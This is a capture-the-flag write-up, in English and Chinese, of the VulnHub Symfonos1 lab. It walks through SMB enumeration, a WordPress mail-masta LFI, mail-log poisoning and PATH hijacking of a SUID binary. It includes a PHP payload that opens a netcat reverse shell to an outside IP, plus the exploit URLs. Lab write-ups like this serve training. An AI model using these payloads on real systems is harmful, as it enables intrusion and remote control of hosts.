vulnhub-30-symfonos1 - My-oscp-all-things

ipddress:192.168.56.15 ### information_gathering open-oprt:25 22 80 139 445 ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609501129327-9beef5ee-2213-43fb-9d42-569f70a6312c.png#align=left&display=inline&height=71&margin=%5Bobject%20Object%5D&name=image.png&originHeight=142&originWidth=604&size=43849&status=done&style=none&width=302) ``` enum4linux 192.168.56.15 ``` SYMFONOS\helios (Local User) smb-share-file: ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609501230190-15801b54-7f13-45a3-8335-ccc2fc6e8c26.png#align=left&display=inline&height=80&margin=%5Bobject%20Object%5D&name=image.png&originHeight=159&originWidth=727&size=66323&status=done&style=none&width=363.5) ### Establish a foothold ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609501383620-c3d19429-8740-4a8a-8dc5-0b682305e760.png#align=left&display=inline&height=273&margin=%5Bobject%20Object%5D&name=image.png&originHeight=546&originWidth=1393&size=248872&status=done&style=none&width=696.5) ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609501407549-ccb633c8-cf1b-4dc5-9d96-61f8736b46ad.png#align=left&display=inline&height=99&margin=%5Bobject%20Object%5D&name=image.png&originHeight=198&originWidth=1103&size=53907&status=done&style=none&width=551.5) gobuster->find /manual ,but nothing can use,so i go on test smb i use this command to connect helios: ``` smbclient \\\\192.168.56.15\\helios -U "helios" ``` pwd:qwerty ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609503394657-1cbe10d0-e7b0-4b11-94c4-2b7bc21ec389.png#align=left&display=inline&height=240&margin=%5Bobject%20Object%5D&name=image.png&originHeight=480&originWidth=1092&size=143624&status=done&style=none&width=546) ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609503758366-9172f74e-2ed4-42c1-a78b-b92a495f1cf9.png#align=left&display=inline&height=138&margin=%5Bobject%20Object%5D&name=image.png&originHeight=276&originWidth=1418&size=142787&status=done&style=none&width=709) 意思是有个目录/h3l105 ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609503957973-b04f06f7-2bbc-4c0f-b872-9065fef731e1.png#align=left&display=inline&height=413&margin=%5Bobject%20Object%5D&name=image.png&originHeight=826&originWidth=587&size=46599&status=done&style=none&width=293.5) ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609507973097-bd630842-5227-43a9-ae71-a8f877d98479.png#align=left&display=inline&height=193&margin=%5Bobject%20Object%5D&name=image.png&originHeight=385&originWidth=1065&size=130021&status=done&style=none&width=532.5) ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609507939156-c5b0e3b3-34e1-4550-9ffd-1b9c5df230e3.png#align=left&display=inline&height=68&margin=%5Bobject%20Object%5D&name=image.png&originHeight=135&originWidth=1706&size=28963&status=done&style=none&width=853) 尝试了下用第二个LFI： [http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd](http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd) LFI -> rce(reverse_shell) ``` telnet 192.168.56.15 25 ``` ``` mail from: <aatrox> rcpt to: helios data <?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.178.51 443 > /tmp/f"); ?> ``` 输入. 结束输入 ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609509438593-f397fbc9-e622-4839-8e04-45b13f1c942b.png#align=left&display=inline&height=207&margin=%5Bobject%20Object%5D&name=image.png&originHeight=413&originWidth=976&size=140618&status=done&style=none&width=488) 输入如下命令反弹shell ``` curl http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios ``` ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609509465002-61697d56-63db-4483-80bf-1ceffc5bc62e.png#align=left&display=inline&height=109&margin=%5Bobject%20Object%5D&name=image.png&originHeight=217&originWidth=972&size=59631&status=done&style=none&width=486) ### Privilege Escalation ``` find / -perm -4000 -type f 2>/dev/null ``` ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609510807305-72e9105b-d867-4a95-abd2-3015d524eb63.png#align=left&display=inline&height=186&margin=%5Bobject%20Object%5D&name=image.png&originHeight=371&originWidth=1049&size=121357&status=done&style=none&width=524.5) ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609511042679-dfbc6ec3-58bb-4bdd-82c4-b589007a085a.png#align=left&display=inline&height=207&margin=%5Bobject%20Object%5D&name=image.png&originHeight=413&originWidth=1189&size=68529&status=done&style=none&width=594.5) 这里可以判断是调用的curl命令，使用strings查看 ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609511496341-149c18ff-8260-4540-84e4-fc9cc05b8831.png#align=left&display=inline&height=340&margin=%5Bobject%20Object%5D&name=image.png&originHeight=680&originWidth=921&size=276774&status=done&style=none&width=460.5) 所以我们需要做的是重新编译一个叫curl的恶意脚本并且修改环境变量： ``` export PATH=/tmp:$PATH ``` ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609511691440-a2985f29-67a1-4ed9-aa5f-fc3a46dd6088.png#align=left&display=inline&height=360&margin=%5Bobject%20Object%5D&name=image.png&originHeight=720&originWidth=1431&size=531655&status=done&style=none&width=715.5)